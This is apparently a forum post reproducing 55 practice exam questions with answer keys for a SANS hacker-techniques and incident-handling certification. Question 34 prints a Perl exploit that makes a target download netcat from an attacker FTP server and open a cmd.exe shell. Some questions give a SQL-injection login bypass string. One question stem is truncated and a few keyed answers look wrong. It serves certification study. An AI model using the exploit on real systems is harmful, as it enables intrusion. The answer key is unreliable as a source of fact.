Hacker Tools, Techniques, Exploits and Incident Handling (SANS)

answerhappygod
Site Admin
Posts: 899603
Joined: Mon Aug 02, 2021 8:13 am


Post by answerhappygod »

Question 1 ( Topic 1 )
Which of the following refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system?
A. Piggybacking
B. Hacking
C. Session hijacking
D. Keystroke logging


Answer : C

Question 2 ( Topic 1 )
Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?
A. Win32/Agent
B. WMA/TrojanDownloader.GetCodec
C. Win32/Conflicker
D. Win32/PSW.OnLineGames


Answer : C

Question 3 ( Topic 1 )
You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?
A. Manual penetration testing
B. Code review
C. Automated penetration testing
D. Vulnerability scanning


Answer : D

Question 4 ( Topic 1 )
Which of the following is designed to protect the Internet resolvers (clients) from forged DNS data created by DNS cache poisoning?
A. Stub resolver
B. BINDER
C. Split-horizon DNS
D. Domain Name System Extension (DNSSEC)


Answer : D

Question 5 ( Topic 1 )
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealthy at this point.
Which of the following types of scans would be most accurate and reliable?
A. UDP scan
B. TCP Connect scan
C. ACK scan
D. Fin scan


Answer : B

Question 6 ( Topic 1 )
Which of the following is a computer worm that caused a denial of service on some Internet hosts and dramatically slowed down general Internet traffic?
A. Klez
B. Code red
C. SQL Slammer
D. Beast


Answer : C

Question 7 ( Topic 1 )
Your network is being flooded by ICMP packets. When you trace them, they come from multiple different IP addresses. What kind of attack is this?
A. Syn flood
B. Ping storm
C. Smurf attack
D. DDOS


Answer : D

Question 8 ( Topic 1 )
Which of the following tools can be used for stress testing of a Web server?
Each correct answer represents a complete solution. Choose two.
A. Internet bots
B. Scripts
C. Anti-virus software
D. Spyware


Answer : A,B

Question 9 ( Topic 1 )
John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as a username and successfully logs on to the user page of the Web site.
Now, John asks we-are-secure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are-secure Website login page against the SQL injection attack?
A. Use the escapeshellarg() function
B. Use the session_regenerate_id() function
C. Use the mysql_real_escape_string() function for escaping input
D. Use the escapeshellcmd() function


Answer : C

Question 10 ( Topic 1 )
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?
A. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
C. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"
D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run


Answer : C


Question 11 ( Topic 1 )
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open, since his company hosts a website that must be accessed from the Internet. Adam is still worried about programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?
A. Block all outgoing traffic on port 21
B. Block all outgoing traffic on port 53
C. Block ICMP type 13 messages
D. Block ICMP type 3 messages


Answer : C

Question 12 ( Topic 1 )
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters ='or''=' as a username and successfully logs in to the user page of the Web site.
The we-are-secure login page is vulnerable to a __________.
A. Dictionary attack
B. SQL injection attack
C. Replay attack
D. Land attack


Answer : B

Question 13 ( Topic 1 )
Which of the following tools is used to download the Web pages of a Website on the local system?
A. wget
B. jplag
C. Nessus
D. Ettercap


Answer : A

Question 14 ( Topic 1 )
Which of the following statements are true about session hijacking?
Each correct answer represents a complete solution. Choose all that apply.
A. Use of a long random number or string as the session key reduces session hijacking.
B. It is used to slow the working of victim's network resources.
C. TCP session hijacking is when a hacker takes over a TCP session between two machines.
D. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.


Answer : A,C,D

Question 15 ( Topic 1 )
You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows server 2003 and Windows active directory installation and placement. Which of the following steps are you using to perform hacking?
A. Scanning
B. Covering tracks
C. Reconnaissance
D. Gaining access


Answer : C


Question 16 ( Topic 1 )
Which of the following are the primary goals of the incident handling team?
Each correct answer represents a complete solution. Choose all that apply.
A. Freeze the scene.
B. Repair any damage caused by an incident.
C. Prevent any further damage.
D. Inform higher authorities.


Answer : A,B,C

Question 17 ( Topic 1 )
You work as a System Engineer for Cyber World Inc. Your company has a single Active Directory domain, and the Hyper-V server role has been installed on one of the servers, namely uC1. uC1 hosts twelve virtual machines. You have been given the task to configure the Shutdown option for uC1, so that each virtual machine shuts down before the main Hyper-V server shuts down.
Which of the following actions will you perform to accomplish the task?
A. Enable the Shut Down the Guest Operating System option in the Automatic Stop Action Properties on each virtual machine.
B. Manually shut down each of the guest operating systems before the server shuts down.
C. Create a batch file to shut down the guest operating system before the server shuts down.
D. Create a logon script to shut down the guest operating system before the server shuts down.


Answer : A

Question 18 ( Topic 1 )
Which of the following takes control of a session between a server and a client using a utility?
A. Dictionary attack
B. Session Hijacking
C. Trojan horse
D. Social Engineering


Answer : B

Question 19 ( Topic 1 )
You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from which of the following?
A. Brute force attack
B. Mail bombing
C. Distributed denial of service (DDOS) attack
D. Malware installation from unknown Web sites


Answer : D

Question 20 ( Topic 1 )
Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?
A. Whishker
B. Nessus
C. SARA
D. Nmap


Answer : B

Question 21 ( Topic 1 )
You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 Active Directory-based single domain single forest network. The company has three Windows 2008 file servers, 150 Windows XP Professional client computers, and thirty UNIX-based client computers. The network users have identical user accounts for both Active Directory and the UNIX realm. You want to ensure that the UNIX clients on the network can access the file servers. You also want to ensure that the users are able to access all resources by logging on only once, and that no additional software is installed on the UNIX clients. What will you do to accomplish this task?
Each correct answer represents a part of the solution. Choose two.
A. Configure a distributed file system (Dfs) on the file server in the network.
B. Enable the Network File System (NFS) component on the file servers in the network.
C. Configure ADRMS on the file servers in the network.
D. Enable User Name Mapping on the file servers in the network.


Answer : B,D

Question 22 ( Topic 1 )
Which of the following is the best method of accurately identifying the services running on a victim host?
A. Use of the manual method of telnet to each of the open ports.
B. Use of a port scanner to scan each port to confirm the services running.
C. Use of hit and trial method to guess the services and ports of the victim host.
D. Use of a vulnerability scanner to try to probe each port to verify which service is running.


Answer : A

Question 23 ( Topic 1 )
Adam works as a Network Administrator for PassGuide Inc. He wants to protect the network from DoS attacks. Which of the following is most useful against DoS attacks?
A. SPI
B. Distributive firewall
C. Honey Pot
D. Internet bot


Answer : A

Question 24 ( Topic 1 )
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access.
How was security compromised and how did the firewall respond?
A. The attack was social engineering and the firewall did not detect it.
B. Security was not compromised as the webpage was hosted internally.
C. The attack was Cross Site Scripting and the firewall blocked it.
D. Security was compromised as keylogger is invisible for firewall.


Answer : A

Question 25 ( Topic 1 )
In which of the following DoS attacks does an attacker send an ICMP packet larger than 65,536 bytes to the target system?
A. Ping of death
B. Jolt
C. Fraggle
D. Teardrop


Answer : A


Question 26 ( Topic 1 )
You work as a Network Administrator for InformSec Inc. You find that the TCP port number 23476 is open on your server. You suspect that there may be a Trojan named Donald Dick installed on your server. Now you want to verify whether Donald Dick is installed on it or not. For this, you want to know the process running on port 23476, as well as the process id, process name, and the path of the process on your server. Which of the following applications will you most likely use to accomplish the task?
A. Tripwire
B. SubSeven
C. Netstat
D. Fport


Answer : D

Question 27 ( Topic 1 )
You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. An attacker uses software that keeps trying password combinations until the correct password is found. Which type of attack is this?
A. Denial-of-Service
B. Man-in-the-middle
C. Brute Force
D. Vulnerability


Answer : C

Question 28 ( Topic 1 )
Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.
Which of the following are the two popular types of buffer overflows?
Each correct answer represents a complete solution. Choose two.
A. Dynamic buffer overflows
B. Stack based buffer overflow
C. Heap based buffer overflow
D. Static buffer overflows


Answer : B,C

Question 29 ( Topic 1 )
Which of the following Incident handling process phases is responsible for defining rules, assembling the human workforce, creating a back-up plan, and testing the plans for an enterprise?
A. Preparation phase
B. Eradication phase
C. Identification phase
D. Recovery phase
E. Containment phase


Answer : A

Question 30 ( Topic 1 )
Which of the following types of attacks is only intended to make a computer resource unavailable to its users?
A. Denial of Service attack
B. Replay attack
C. Teardrop attack
D. Land attack


Answer : A


Question 31 ( Topic 1 )
John, a part-time hacker, has gained unauthorized access to the www.yourbank.com banking Website and stolen the bank account information of its users and their credit card numbers by using the SQL injection attack. Now, John wants to sell this information to a malicious person, Mark, and make a deal to get a good amount of money. Since he does not want to send the hacked information in clear text format to Mark, he decides to send the information as hidden text. For this, he takes a steganography tool and hides the information in ASCII text by appending whitespace to the end of lines, and encrypts the hidden information by using the IDEA encryption algorithm. Which of the following tools is John using for steganography?
A. Image Hide
B. 2Mosaic
C. Snow.exe
D. Netcat


Answer : C

Question 32 ( Topic 1 )
You run the following command while using Nikto Web scanner:
perl nikto.pl -h 192.168.0.1 -p 443
What action do you want to perform?
A. Using it as a proxy server
B. Updating Nikto
C. Setting Nikto for network sniffing
D. Port scanning


Answer : D

Question 33 ( Topic 1 )
Which of the following is spy software that records activity on Macintosh systems via snapshots, keystrokes, and Web site logging?
A. Spector
B. Magic Lantern
C. eblaster
D. NetBus


Answer : A

Question 34 ( Topic 1 )
Adam, a malicious hacker, performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=;
print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);
Which of the following is the expected result of the above exploit?
A. Creates a share called "sasfile" on the target system
B. Creates an FTP server with write permissions enabled
C. Opens up a SMTP server that requires no username or password
D. Opens up a telnet listener that requires no username or password


Answer : D

Question 35 ( Topic 1 )
Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?
A. Rainbow attack
B. Brute Force attack
C. Dictionary attack
D. Hybrid attack


Answer : A


Question 36 ( Topic 1 )
Which of the following types of attacks is the result of vulnerabilities in a program due to poor programming techniques?
A. Evasion attack
B. Denial-of-Service (DoS) attack
C. Ping of death attack
D. Buffer overflow attack


Answer : D

Question 37 ( Topic 1 )
Which of the following methods can be used to detect session hijacking attack?
A. nmap
B. Brutus
C. ntop
D. sniffer


Answer : D

Question 38 ( Topic 1 )
is true?
A. It manages security credentials and public keys for message encryption.
B. It is a collection of files used by Microsoft for software updates released between major service pack releases.
C. It is a condition in which an application receives more data than it is configured to accept.
D. It is a false warning about a virus.


Answer : C

Question 39 ( Topic 1 )
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He finds that the We-are-secure server is vulnerable to attacks. As a countermeasure, he suggests that the Network Administrator should remove the IPP printing capability from the server. He is suggesting this as a countermeasure against __________.
A. IIS buffer overflow
B. NetBIOS NULL session
C. SNMP enumeration
D. DNS zone transfer


Answer : A

Question 40 ( Topic 1 )
Adam has installed and configured his wireless network. He has enabled numerous security features such as changing the default SSID, enabling WPA encryption, and enabling MAC filtering on his wireless router. Adam notices that when he uses his wireless connection, the speed is sometimes 16 Mbps and sometimes it is only 8 Mbps or less.
Adam connects to the management utility wireless router and finds out that a machine with an unfamiliar name is connected through his wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the same MAC address as his laptop.
Which of the following attacks has occurred on the wireless network of Adam?
A. NAT spoofing
B. DNS cache poisoning
C. MAC spoofing
D. ARP spoofing


Answer : C


Question 41 ( Topic 1 )
Which of the following is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems, and fax machines?
A. Demon dialing
B. Warkitting
C. War driving
D. Wardialing


Answer : D

Question 42 ( Topic 1 )
Which of the following tools can be used to detect the steganography?
A. Dskprobe
B. Blindside
C. ImageHide
D. Snow


Answer : A

Question 43 ( Topic 1 )
Which of the following statements are true about a keylogger?
Each correct answer represents a complete solution. Choose all that apply.
A. It records all keystrokes on the victim's computer in a predefined log file.
B. It can be remotely installed on a computer system.
C. It is a software tool used to trace all or specific activities of a user on a computer.
D. It uses hidden code to destroy or scramble data on the hard disk.


Answer : A,B,C

Question 44 ( Topic 1 )
Which of the following commands can be used for port scanning?
A. nc -t
B. nc -z
C. nc -w
D. nc -g


Answer : B

Question 45 ( Topic 1 )
You work as a Penetration Tester for Infosec Inc. Your company takes on security auditing projects. Recently, your company has assigned you a project to test the security of the we-are-secure.com Web site. For this, you want to perform an idle scan so that you can find the open ports on the we-are-secure.com server. You are using the Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless of whether the ports are open or closed.
Sometimes, IPID is being incremented by more than one value.
What may be the reason?
A. The firewall is blocking the scanning process.
B. The zombie computer is not connected to the we-are-secure.com Web server.
C. The zombie computer is the system interacting with some other system besides your computer.
D. Hping does not perform idle scanning.


Answer : C


Question 46 ( Topic 1 )
Which of the following are types of access control attacks?
Each correct answer represents a complete solution. Choose all that apply.
A. Spoofing
B. Brute force attack
C. Dictionary attack
D. Mail bombing


Answer : A,B,C

Question 47 ( Topic 1 )
Which of the following Nmap commands is used to perform a UDP port scan?
A. nmap -sY
B. nmap -sS
C. nmap -sN
D. nmap -sU


Answer : D

Question 48 ( Topic 1 )
Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack?
A. Dash (-)
B. Double quote (")
C. Single quote (')
D. Semi colon (;)


Answer : C

Question 49 ( Topic 1 )
Which of the following attacks come under the category of layer 2 Denial-of-Service attacks?
Each correct answer represents a complete solution. Choose all that apply.
A. Spoofing attack
B. SYN flood attack
C. Password cracking
D. RF jamming attack


Answer : A,B

Question 50 ( Topic 1 )
You check performance logs and note that there has been a recent dramatic increase in the amount of broadcast traffic. What is this most likely to be an indicator of?
A. Virus
B. Syn flood
C. Misconfigured router
D. DoS attack


Answer : D


Question 51 ( Topic 1 )
Which of the following Denial-of-Service (DoS) attacks employ IP fragmentation mechanism?
Each correct answer represents a complete solution. Choose two.
A. Land attack
B. SYN flood attack
C. Teardrop attack
D. Ping of Death attack


Answer : C,D

Question 52 ( Topic 1 )
Which of the following applications is an example of a data-sending Trojan?
A. SubSeven
B. Senna Spy Generator
C. Firekiller 2000
D. eBlaster


Answer : D

Question 53 ( Topic 1 )
Which of the following statements are true about firewalking?
Each correct answer represents a complete solution. Choose all that apply.
A. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall.
B. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall.
C. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall.
D. Firewalking works on the UDP packets.


Answer : A,B,C

Question 54 ( Topic 1 )
Network mapping provides a security testing team with a blueprint of the organization.
Which of the following steps is NOT a part of manual network mapping?
A. Gathering private and public IP addresses
B. Collecting employees information
C. Banner grabbing
D. Performing Neotracerouting


Answer : D

Question 55 ( Topic 1 )
You work as a Network Administrator for Net Perfect Inc. The company has a Windows-based network. The company wants to fix potential vulnerabilities existing on the tested systems. You use Nessus as a vulnerability scanning program to fix the vulnerabilities.
Which of the following vulnerabilities can be fixed using Nessus?
Each correct answer represents a complete solution. Choose all that apply.
A. Misconfiguration (e.g. open mail relay, missing patches, etc.)
B. Vulnerabilities that allow a remote cracker to control sensitive data on a system
C. Vulnerabilities that allow a remote cracker to access sensitive data on a system
D. Vulnerabilities that help in Code injection attacks


Answer : A,B,C